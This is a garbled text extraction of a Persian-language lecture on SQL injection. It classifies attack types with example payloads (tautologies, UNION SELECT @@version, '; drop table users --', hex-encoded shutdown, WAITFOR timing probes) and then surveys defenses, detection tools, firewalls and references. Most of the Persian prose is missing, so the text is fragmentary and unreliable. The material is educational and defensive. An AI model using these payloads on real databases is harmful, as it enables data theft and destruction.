حمله تزریق SQL
description
Transcript of حمله تزریق SQL
SQL :
:
Sql Injection Attack 1 WEB APPLICATION2 SQLIA3 SQLIA42 SQLIA3
SQLIA
SQLIA3
OWASP
4
WEB APPLICATION
5
SQLIA
Tautologies Illegal/Logically Incorrect QueriesUnion QueryPiggy- Backed Queries Stored Procedures InferenceAlternate Encodings6
Tautologies attack
: SELECT FROM user WHEREid = 1 or 1 = 1 AND password = 1111
7
Illegal/Logically Incorrect Queries attack
: pin : convert (int,(select top 1 name from sysobjects wheretype=u)) Query CGI layer :SELECT accounts FROM users WHERE login= AND pass= AND pin= convert (int,(select top 1 name from sysobjects where xtype=u)) sql: "Microsoft OLE DB Provider for SQL Server (0x80040E07) Error converting nvarchar value CreditCards to a column of data type int. : 1- sql server . 2- credit card
8
Union Query attack: $sqlquery = "SELECT * From news WHERE id =$id";$process=odbc_exec($sqlconnect, $sqlquery);echo odbc_result($process,2);
1 and 1=2 union select 1,@@version id :SELECT * From news WHERE id = 1 and 1=0union select 1,@@version,3 -- .9
Piggy- Backed Queries attack: ;drop table users - - SELECT accounts FROM users WHERE login=doe ANDpass=; drop table users -- AND pin=123
: users
10
Stored Procedures attack
: : CREATE PROCEDURE DBO.isAuthenticated @userName varchar2, @pass varchar2, @pin int ASEXEC("SELECT accounts FROM usersWHERE login=" +@userName+ " and pass=" +@password+ " and pin=" +@pin);GO ; SHUTDOWN; - - pass:SELECT accounts FROM users WHERElogin=doe AND pass= ; SHUTDOWN; -- AND pin=
: !11
Alternate Encodings attack: legalUser; exec(0x73687574646f776e) - - loginSELECT accounts FROM users WHERE login=legalUser;exec(char(0x73687574646f776e)) -- AND pass= shut down .
12
Inference attack: -1 Blind Injection : true false1-SELECT accounts FROM users WHERE login=legalUserand 1=0 -- AND pass= AND pin=0
2-SELECT accounts FROM users WHERE login=legalUser and 1=1 -- AND pass= AND pin=0 : login . : login .13
Inference attack (continue)Timing Attack-2 sql SELECT accounts FROM users WHERE login=legalUserand ASCII(SUBSTRING((select top 1 name from sysobjects),1,1)) > X WAITFOR 5 -- AND pass= AND pin=0
14
(WAVES) (JDBC-Checker) (Valeur ) proxy (SQLrand)
15
() (WAVES) web crawler
(JDBC-Checker) 16
() (AMNESIA ) .
17
() (SQL DOM Safe Query Objects) API : 18
() (Valeur) . false positive false negative 19
() proxy (Security Gateway) (SPDL) .
20
() (SQLrand) SQL proxy .:
21
22
23CODE SECURELY
MONITOR FOR ATTACKS BLOCK ATTACKS
CODE SECURELY Perl Java VB.NET24
Java
25
MONITOR FOR ATTACKS (NIDS) pattern-matching snort regular expression IDS (HIDS) (AppIDS)
26
BLOCK ATTACKSApplication firewallsWeb-application firewalls IDS SSL
27
BLOCK ATTACKS Cisco Application Velocity System (AVS) (built-in) .28ModSecurity
.
Bravenboer, M., Dolstra, E., Visser, E., "Preventing injection attacks with syntax embeddings", Science of Computer Programming, vol. 75, pp. 473-495, 2010.Clarke, J., "SQL Injection Attacks and Defense", Elsevier, Syngress Publishing, Inc., 2009.Halfond, W. G. J., Viegas, J., Orso, A., "A Classification of SQL Injection Attacks and Countermeasures", Computing, 2006.Jeong, I. Lee, S., Yeo, S., Moond, J., "A novel method for SQL injection attack detection based on removing SQL query attribute values", Mathematical and Computer Modelling, vol. 55, pp. 5868, 2012.Mackay, C. A., "SQL Injection Attacks and Some Tips on How to Prevent Them", Technical report, The Code Project, 2005, http://www.codeproject.com/cs/database/SqlInjectionAttacks.asp.Moyle, S., "The blackhats toolbox: SQL injections", Network Security, pp. 12-14, 2007.Muthuprasanna, M., Kothari, W. Ke, S., "Eliminating SQL Injection Attacks - A Transparent Defense Mechanism", Analysis.Nystrom, M. G., "SQL Injection Detection", O'Reilly Media, Inc, 2007.Ping-Chen, X., "SQL injection attack and guard technical research", Procedia Engineering, vol. 15, pp. 4131- 4135, 2011.29
Question? or 1=1 - - Select @@version ) or 1 = 1 - - ASCII(SUBSTRING((select top 1 name from sysobjects),1,1)) > X WAITFOR 5 --
exec(0x73687574646f776e) - -